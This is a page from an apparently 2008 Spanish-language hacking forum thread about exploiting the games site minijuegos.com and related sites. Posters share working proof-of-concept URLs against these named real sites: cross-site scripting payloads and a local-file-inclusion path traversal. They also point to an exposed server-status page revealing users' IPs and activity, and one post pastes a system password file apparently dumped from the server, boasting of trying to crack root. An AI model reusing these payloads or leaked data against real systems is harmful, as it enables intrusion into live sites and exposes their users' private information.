Páginas: 1 [2] 
|
 |
|
 Autor
|
Tema: [°] Todas las IPs de los usuarios online de Minijuegos (Leído 4222 veces)
|
Rozor
 Desconectado
Mensajes: 249
As I Walk Through The Valley Of The Shadow Of Dead
|
Es que la ignorancia no tiene precio R = Remote por lo cual no es RFLocal es LFI o Local File Inclusion, lo cual quiere decir que al igual que con un RFI pedes meterle un archivo remoto, con un LFI lo puedes hacer con un archivo local. RFLocal ( Nunca lo habia escuchado ), y el reporte original es mio dado como LFI "Local File Inclusion". Reporte original, hay dos bug uno el de minijuegos y el otro en petardas que no viene al caso pero los reporte el mismo dia.
Bug En Petardas y Minijuegos - [29-11-06]
-El grupo !Patitos Team reporta 2 bug. El primero es un XSS en la pagina pornografica de Petardas. El segundo un local file include en la pagina de juegos y ocio de MiniJuegos .
@PoC Petardas: http://www.petardas.com:80/videos/video.php?v=gatito&yt=>"><script>alert(31337);</script>
@PoC MiniJuegos: http://www.minijuegos.com/juegos/jugar.php?id=../../index
@PoC MiniJuegos: http://www.minijuegos.com/juegos/jugar.php?id=[LFI] |
|
|
|
|
En línea
|
Suck my Dick!!!
|
|
|
ActiveSheet
Desconectado
Mensajes: 384
Feeling Jazz
|
Me estaba mofando men ovio not found jaja
|
|
|
|
|
En línea
|
|
|
|
Rozor
Desconectado
Mensajes: 249
As I Walk Through The Valley Of The Shadow Of Dead
|
ahm ok yo tambien me mofe de el un rato x"DDDDDDDDDDDDDDD es digno de ello  yo creia que era duda seria jajajaja , bue nada esto ya queda cerrado creo yo no? x"DDDDDDDDDD ademas se fue del foro debe ser que le dio verguenza. |
|
|
|
|
En línea
|
Suck my Dick!!!
|
|
|
|
|
741852
Desconectado
Mensajes: 1.595
Central, Pont Aeri, Kontrol, Mansion, Masia...(L)
|
vaaaamos a juackiar todas esas IPs sisisisis!!!
ajaja
aporte interesantee, salu2!
pd, con la coña tiene un cojón de visitas este tema.... alelele
|
|
|
|
|
En línea
|
since 1992 there's a club wich is making history, seven years later in 1999 it's still kicking!, PONT AERI!
..... and in 2008 IT'S STILL KICKING !!!
pont aeri siempre
hardcore for life [H4L]
|
|
|
|
c1c4tr1z
|
Perdon si esta mal "posteado", pero aca hay una vulnerabilidad sobre XSS o HTMLi en minijuegos.com: http://www.minijuegos.com/busqueda.php?nov=0&termino=%22%3E%3Cmarquee%3E%3Ch1%3EXSS%3C/h1%3E%3C/marquee%3E UPDATE: Y despues dejaron intensionalmente (creo  ) server-status habilitado: http://www.minijuegos.com/server-status Lo que nos permitiria ver en tiempo real a los usuarios conectados, path del servidor, la accion que toma el usuario remoto, etc. Y en minitoneos.com, por el input de usuario [metodo POST]: http://www.minitorneos.com/registro/ Saludos! |
|
|
|
« Última modificación: 11 Julio 2008, 00:39 por c1c4tr1z »
|
En línea
|
|
|
|
|
dimitrix
|
Es como un RFI (Remote File Include) pero con archivos locales de su cuenta.
|
|
|
|
|
En línea
|
|
|
|
Rozor
Desconectado
Mensajes: 249
As I Walk Through The Valley Of The Shadow Of Dead
|
pues eso LFI ( Local File Include/Inclusion ).
o RFI ( Remote File Include/Inclusion ).
¿Tan dificil es? xDDDDDDD
¿no es realmente humillante para ti lo que escribes?
|
|
|
|
|
En línea
|
Suck my Dick!!!
|
|
|
ArcheritONE
Desconectado
Mensajes: 438
Estar orgulloso de Catalunya y España es posible
|
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
Muy curioso, un FreeBSD, kernel vulnerable y el john aun no entrega pass de root XDDD PASSWORDS# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
ftp:*:21:14:FTP owner:/nonexistent:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
admin:*:1001:0:Admin User:/home/admin:/bin/tcsh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
vscan:*:110:110:Scanning Virus Account:/var/amavis:/bin/sh
pdns_recursor:*:120:120:pdns_recursor pseudo-user:/nonexistent:/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
dovecot:*:143:143:Dovecot User:/var/empty:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
user3:*:1002:1002:User &:/home/user3:/bin/tcsh
-berz3k. |
|
|
|
|
En línea
|
|
|
|
|
Páginas: 1 [2] 
|
|
|
 |
